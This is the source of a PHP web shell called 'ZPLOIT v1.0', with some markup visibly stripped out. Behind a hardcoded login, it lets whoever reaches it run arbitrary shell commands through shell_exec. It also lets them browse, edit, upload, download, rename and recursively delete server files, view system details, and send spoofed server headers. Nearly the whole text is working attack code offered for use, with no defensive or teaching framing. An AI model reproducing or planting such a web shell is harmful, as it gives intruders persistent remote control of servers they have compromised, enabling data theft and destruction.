ob_start();$PASS = 'zploit';$USER = 'zploit';session_start();if(isset($_POST['p']) && isset($_POST['u'])){ if(sha1($_POST['p']) === sha1($PASS) && sha1($_POST['u']) === sha1($USER)){ $_SESSION['auth'] = sha1($PASS.session_id()); } else { header('Location: ?msg=fail'); exit; }}if(!isset($_SESSION['auth']) || $_SESSION['auth'] !== sha1($PASS.session_id())){Zploit Login echo '<!DOCTYPE html><title>Zploit Login</title><style>body{background:#000;color:#0f0;font-family:monospace;}input{background:#111;color:#0f0;border:1px solid #0f0;}input[type="submit"]{background:#0a0;color:#000;border:none;padding:5px 10px;cursor:pointer;}</style>'; echo '



'; echo '
'; echo '

▓▒░ ZPLOIT ACCESS ░▒▓

'; echo 'USER:

'; echo 'PASS:


'; echo ''; echo '
'; echo '
'; echo ''; ob_end_flush(); exit;}if(isset($_POST['action']) && $_POST['action'] == 'logout'){ session_destroy(); header('Location: ?'); exit;}header('X-Powered-By: NONE');header('Server: Not-Apache');header('Content-Type: text/html; charset=UTF-8');header('Cache-Control: no-cache, must-revalidate');$dir = isset($_GET['d']) ? base64_decode($_GET['d']) : getcwd();$dir = str_replace('\\', '/', $dir);if(substr($dir, -1) != '/'){ $dir .= '/'; }function checkPermission($path, $type = 'write') { if (!file_exists($path)) return false; if ($type == 'write' || $type == 'rename' || $type == 'delete') { return is_writable($path); } if ($type == 'read') { return is_readable($path); } if ($type == 'execute') { return is_executable($path); } return false;}if(isset($_GET['delete'])){ $path = base64_decode($_GET['delete']); $msg = ''; if(is_file($path) || is_dir($path)){ if(checkPermission($path, 'delete')){ if(is_dir($path)){ function del_tree($dir) { $files = array_diff(scandir($dir), array('.','..')); foreach ($files as $file) { (is_dir("$dir/$file")) ? del_tree("$dir/$file") : unlink("$dir/$file"); } return rmdir($dir); } del_tree($path); $msg = '▓ DELETED: '.basename($path); } else { unlink($path); $msg = '▓ DELETED: '.basename($path); } } else { $msg = '▓ ACCESS DENIED: '.basename($path); } } else { $msg = '▓ PATH NOT FOUND'; } header('Location: ?d='.base64_encode($dir).'&msg='.urlencode($msg)); exit;}if(isset($_POST['action'])){ $action = $_POST['action']; $path = $_POST['path']; $new_name = isset($_POST['new_name']) ? $_POST['new_name'] : ''; $content = isset($_POST['content']) ? $_POST['content'] : ''; $msg = ''; switch($action){ case 'rename': if(checkPermission($path, 'rename')){ $new_path = dirname($path) . '/' . $new_name; if(checkPermission(dirname($path), 'write')){ if(rename($path, $new_path)){ $msg = '▓ RENAMED: '.basename($path).' → '.$new_name; } else { $msg = '▓ RENAME FAILED'; } } else { $msg = '▓ PERMISSION DENIED'; } } else { $msg = '▓ PERMISSION DENIED: '.basename($path); } break; case 'edit_save': if(checkPermission($path, 'write')){ if(file_put_contents($path, $content) !== false){ $msg = '▓ SAVED: '.basename($path); } else { $msg = '▓ SAVE FAILED'; } } else { $msg = '▓ PERMISSION DENIED: '.basename($path); } break; case 'upload': if(checkPermission($dir, 'write')){ if(isset($_FILES['file']) && $_FILES['file']['error'] == UPLOAD_ERR_OK){ $target = $dir . basename($_FILES['file']['name']); if(move_uploaded_file($_FILES['file']['tmp_name'], $target)){ $msg = '▓ UPLOADED: '.basename($_FILES['file']['name']); } else { $msg = '▓ UPLOAD FAILED'; } } else { $msg = '▓ UPLOAD ERROR'; } } else { $msg = '▓ PERMISSION DENIED'; } break; } header('Location: ?d='.base64_encode($dir).'&msg='.urlencode($msg)); exit;}$upload_enabled = checkPermission($dir, 'write');<!DOCTYPE html>ZPLOIT v1.0 <title>ZPLOIT v1.0</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: #000; color: #0f0; font-family: 'Courier New', monospace; font-size: 13px; margin: 0; padding: 0; overflow-x: hidden; } ::selection { background: #0f0; color: #000; } .blink { animation: blink 1s infinite; } @keyframes blink { 0%, 100% { opacity: 1; } 50% { opacity: 0; } } .container { padding: 10px; } .header { background: #111; padding: 8px 10px; border-bottom: 2px solid #0f0; border-top: 2px solid #0f0; margin-bottom: 10px; position: relative; } .header:before { content: "▓▒░"; color: #0a0; margin-right: 10px; } .header:after { content: "░▒▓"; color: #0a0; margin-left: 10px; } .path-navigation { display: inline-block; margin-left: 10px; } .path-segment { color: #0ff; text-decoration: none; cursor: pointer; padding: 1px 4px; } .path-segment:hover { background: #0f0; color: #000; } .path-separator { color: #0a0; margin: 0 3px; } .cmd_form input[type="text"] { background: #111; color: #0f0; border: 1px solid #0a0; width: 500px; padding: 5px; font-family: 'Courier New', monospace; font-size: 13px; } .cmd_form input[type="submit"] { background: #0a0; color: #000; border: none; padding: 5px 15px; cursor: pointer; font-family: 'Courier New', monospace; font-weight: bold; font-size: 13px; } .sys-box { background: #111; border: 1px solid #0a0; margin: 15px 0; padding: 0; position: relative; } .sys-title { background: #0a0; color: #000; padding: 4px 8px; font-weight: bold; border-bottom: 1px solid #0f0; } .sys-content { padding: 10px; line-height: 1.4; } .sys-line { margin: 3px 0; padding: 2px 0; border-bottom: 1px dotted #222; } .sys-label { color: #0ff; display: inline-block; width: 150px; font-weight: bold; } .sys-value { color: #0f0; } .sys-value:before { content: ">"; color: #0a0; margin-right: 5px; } .permission-dot { display: inline-block; width: 8px; height: 8px; border-radius: 50%; margin-left: 5px; } .perm-yes { background: #0f0; box-shadow: 0 0 5px #0f0; } .perm-no { background: #f00; box-shadow: 0 0 5px #f00; } .file_table { width: 100%; border-collapse: collapse; margin: 10px 0; border: 1px solid #0a0; } .file_table th { background: #0a0; color: #000; padding: 8px; text-align: left; font-weight: bold; border-bottom: 2px solid #0f0; } .file_table td { padding: 6px 8px; border-bottom: 1px solid #222; } .file_table tr:hover { background: #111; } .dir_row { background: #001; } .file_row { background: #000; } .msg { background: #300; color: #f88; padding: 8px; margin: 10px 0; border: 1px solid #f00; border-left: 5px solid #f00; } .msg-success { background: #030; color: #8f8; border: 1px solid #0f0; border-left: 5px solid #0f0; } .edit_area { width: 100%; height: 400px; background: #111; color: #0f0; border: 2px solid #0a0; padding: 10px; font-family: 'Courier New', monospace; font-size: 13px; resize: vertical; } .btn { background: #0a0; color: #000; border: none; padding: 5px 12px; cursor: pointer; font-family: 'Courier New', monospace; font-weight: bold; font-size: 12px; text-decoration: none; display: inline-block; margin: 2px; } .btn:hover { background: #0f0; } .btn-disabled { background: #333; color: #666; cursor: not-allowed; } .action-link { background: #222; color: #0ff; border: 1px solid #0a0; padding: 3px 8px; text-decoration: none; display: inline-block; margin: 0 3px; font-size: 11px; } .action-link:hover { background: #0a0; color: #000; } .action-link-disabled { background: #333; color: #666; border: 1px solid #666; cursor: not-allowed; } .delete-link { background: #300; color: #f88; border: 1px solid #f00; } .delete-link:hover { background: #f00; color: #000; } .glitch { position: relative; } .glitch:before { content: attr(data-text); position: absolute; left: -1px; text-shadow: 1px 0 #f0f; background: #000; overflow: hidden; clip: rect(0, 900px, 0, 0); animation: glitch-1 2s infinite linear alternate-reverse; } @keyframes glitch-1 { 0% { clip: rect(42px, 9999px, 44px, 0) } 5% { clip: rect(12px, 9999px, 59px, 0) } 10% { clip: rect(48px, 9999px, 29px, 0) } 15% { clip: rect(42px, 9999px, 73px, 0) } 20% { clip: rect(63px, 9999px, 27px, 0) } 25% { clip: rect(34px, 9999px, 55px, 0) } 30% { clip: rect(86px, 9999px, 73px, 0) } 35% { clip: rect(20px, 9999px, 20px, 0) } 40% { clip: rect(26px, 9999px, 60px, 0) } 45% { clip: rect(25px, 9999px, 66px, 0) } 50% { clip: rect(57px, 9999px, 98px, 0) } 55% { clip: rect(5px, 9999px, 46px, 0) } 60% { clip: rect(82px, 9999px, 31px, 0) } 65% { clip: rect(54px, 9999px, 27px, 0) } 70% { clip: rect(28px, 9999px, 99px, 0) } 75% { clip: rect(45px, 9999px, 69px, 0) } 80% { clip: rect(23px, 9999px, 85px, 0) } 85% { clip: rect(54px, 9999px, 84px, 0) } 90% { clip: rect(45px, 9999px, 47px, 0) } 95% { clip: rect(37px, 9999px, 20px, 0) } 100% { clip: rect(4px, 9999px, 91px, 0) } } h1, h2, h3 { color: #0ff; margin: 10px 0; padding-bottom: 5px; border-bottom: 1px dashed #0a0; } h1:before, h2:before { content: "▓ "; color: #0f0; } hr { border: none; height: 1px; background: linear-gradient(to right, transparent, #0a0, transparent); margin: 20px 0; } </style><div class="header"> <span class="glitch" data-text="ZPLOIT v1.0">ZPLOIT v1.0</span> | <span class="path-navigation"> $path_parts = explode('/', trim($dir, '/')); $current_path = ''; echo '<a href="?d=' . base64_encode('/') . '" class="path-segment">ROOT</a>'; foreach ($path_parts as $part) { if (!empty($part)) { $current_path .= '/' . $part; echo '<span class="path-separator">/</span>'; echo '<a href="?d=' . base64_encode($current_path . '/') . '" class="path-segment">' . htmlspecialchars($part) . '</a>'; } } </span>
</div><div class="container"> if(isset($_GET['msg'])): <div class="msg echo (strpos($_GET['msg'], '▓ DELETED') !== false || strpos($_GET['msg'], '▓ SAVED') !== false || strpos($_GET['msg'], '▓ UPLOADED') !== false || strpos($_GET['msg'], '▓ RENAMED') !== false) ? 'msg-success' : ''; "> <span class="blink">!</span> echo htmlspecialchars(urldecode($_GET['msg'])); </div> endif; <div class="sys-box"> <div class="sys-title"># SYSTEM DASHBOARD</div> <div class="sys-content"> <div class="sys-line"><span class="sys-label">KERNEL</span><span class="sys-value"> echo php_uname('s') . ' ' . php_uname('r') . ' ' . php_uname('m'); </span></div> <div class="sys-line"><span class="sys-label">SOFTWARE</span><span class="sys-value"> echo $_SERVER['SERVER_SOFTWARE'] ?? 'N/A'; </span></div> <div class="sys-line"><span class="sys-label">PHP VERSION</span><span class="sys-value"> echo phpversion(); </span></div> <div class="sys-line"><span class="sys-label">USER ID</span><span class="sys-value"> echo get_current_user() . ' [' . getmyuid() . ':' . getmygid() . ']'; </span></div> <div class="sys-line"><span class="sys-label">LOCATION</span><span class="sys-value"> echo $dir; </span></div> <div class="sys-line"><span class="sys-label">PERMISSIONS</span><span class="sys-value"> echo substr(sprintf('%o', fileperms($dir)), -4); <span class="permission-dot echo checkPermission($dir, 'read') ? 'perm-yes' : 'perm-no'; "></span> <span class="permission-dot echo checkPermission($dir, 'write') ? 'perm-yes' : 'perm-no'; "></span> <span class="permission-dot echo checkPermission($dir, 'execute') ? 'perm-yes' : 'perm-no'; "></span> </span></div> <div class="sys-line"><span class="sys-label">NETWORK</span><span class="sys-value"> echo $_SERVER['REMOTE_ADDR'] ?? '127.0.0.1'; → echo $_SERVER['SERVER_ADDR'] ?? 'N/A'; </span></div> <div class="sys-line"><span class="sys-label">RESOURCES</span><span class="sys-value"> echo ini_get('memory_limit') . ' | ' . ini_get('upload_max_filesize') . ' | ' . ini_get('max_execution_time') . 's'; </span></div> </div></div>

COMMAND TERMINAL

<hr>if(isset($_POST['cmd'])): echo '<div class="sys-box">'; echo '<div class="sys-title"># COMMAND OUTPUT</div>'; echo '<div class="sys-content"><pre>'; echo htmlspecialchars(shell_exec($_POST['cmd'])); echo '</pre></div></div>';endif;if(isset($_GET['edit'])){ $file_path = base64_decode($_GET['edit']); if(is_file($file_path)){ $can_edit = checkPermission($file_path, 'write'); if($can_edit){ $content = file_get_contents($file_path); echo '<div class="sys-box">'; echo '<div class="sys-title"># EDIT FILE: ' . basename($file_path) . '</div>'; echo '<div class="sys-content">'; echo '
'; echo ''; echo ''; echo '<textarea name="content" class="edit_area">'.htmlspecialchars($content).'</textarea>

'; echo ''; echo ' <a href="?d='.base64_encode($dir).'" class="btn">[ CANCEL ]</a>'; echo '
</div></div>'; } else { echo '<div class="msg">▓ PERMISSION DENIED: Cannot edit ' . basename($file_path) . '</div>'; echo '<a href="?d='.base64_encode($dir).'" class="btn">[ BACK ]</a>'; } } else { echo '<div class="msg">▓ FILE NOT FOUND</div>'; } echo '</div>'; ob_end_flush(); exit;}if(isset($_GET['rename'])){ $file_path = base64_decode($_GET['rename']); $can_rename = checkPermission($file_path, 'rename') && checkPermission(dirname($file_path), 'write'); if($can_rename){ echo '<div class="sys-box">'; echo '<div class="sys-title"># RENAME: ' . basename($file_path) . '</div>'; echo '<div class="sys-content">'; echo '
'; echo ''; echo ''; echo 'NEW NAME:

'; echo ''; echo ' <a href="?d='.base64_encode($dir).'" class="btn">[ CANCEL ]</a>'; echo '
</div></div>'; } else { echo '<div class="msg">▓ PERMISSION DENIED: Cannot rename ' . basename($file_path) . '</div>'; echo '<a href="?d='.base64_encode($dir).'" class="btn">[ BACK ]</a>'; } echo '</div>'; ob_end_flush(); exit;}if(isset($_GET['download'])){ $file_path = base64_decode($_GET['download']); if(is_file($file_path) && is_readable($file_path)){ header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file_path).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file_path)); readfile($file_path); ob_end_flush(); exit; } else { echo '<div class="msg">▓ FILE NOT FOUND OR NOT READABLE</div>'; }}

FILE SYSTEM

<table class="file_table"><thead> <th>TYPE</th> <th>NAME</th> <th>SIZE</th> <th>PERMS</th> <th>WRITE</th> <th>ACTIONS</th> </thead><tbody>$parent_dir = dirname($dir);if($parent_dir != $dir){ echo '<tr class="dir_row"><td colspan="6"><a href="?d='.base64_encode($parent_dir).'" class="btn">[ .. PARENT ]</a>';}$items = @scandir($dir);if($items !== false){ foreach($items as $item){ if($item == '.' || $item == '..'){ continue; } $path = $dir . $item; $is_dir = is_dir($path); $perms = substr(sprintf('%o', fileperms($path)), -4); $size = $is_dir ? 'DIR' : round(filesize($path)/1024, 2) . ' KB'; $writable = checkPermission($path, 'write'); $readable = checkPermission($path, 'read'); echo '<tr class="'.($is_dir ? 'dir_row' : 'file_row').'">'; echo ''.($is_dir ? '📁' : '📄').''; echo ''.($is_dir ? '<a href="?d='.base64_encode($path).'">' : '').'<strong>'.htmlspecialchars($is_dir ? '['.$item.']' : $item).'</strong>'.($is_dir ? '</a>' : '').''; echo ''.$size.''; echo ''.$perms.''; echo '<span class="permission-dot '.($writable ? 'perm-yes' : 'perm-no').'"></span>'; echo ''; if(!$is_dir){ echo $writable ? '<a href="?edit='.base64_encode($path).'&d='.base64_encode($dir).'" class="action-link">EDIT</a>' : '<span class="action-link-disabled">EDIT</span>'; echo $readable ? '<a href="?download='.base64_encode($path).'" class="action-link">DL</a>' : '<span class="action-link-disabled">DL</span>'; } echo $writable && checkPermission(dirname($path), 'write') ? '<a href="?rename='.base64_encode($path).'&d='.base64_encode($dir).'" class="action-link">RN</a>' : '<span class="action-link-disabled">RN</span>'; echo $writable ? '<a href="?delete='.base64_encode($path).'&d='.base64_encode($dir).'" onclick="return confirm(\'Delete '.htmlspecialchars($item).'?\')" class="action-link delete-link">DEL</a>' : '<span class="action-link-disabled">DEL</span>'; echo ''; echo ''; }} else { echo '<td colspan="6"><div class="msg">▓ ACCESS DENIED - Directory not readable</div>';}</tbody><hr>

FILE UPLOAD

if($upload_enabled): <div class="sys-box"> <div class="sys-title"># UPLOAD TO: echo htmlspecialchars($dir); </div> <div class="sys-content">
</div></div> else: <div class="msg">▓ PERMISSION DENIED - Cannot upload to this directory</div> endif; </div>ob_end_flush();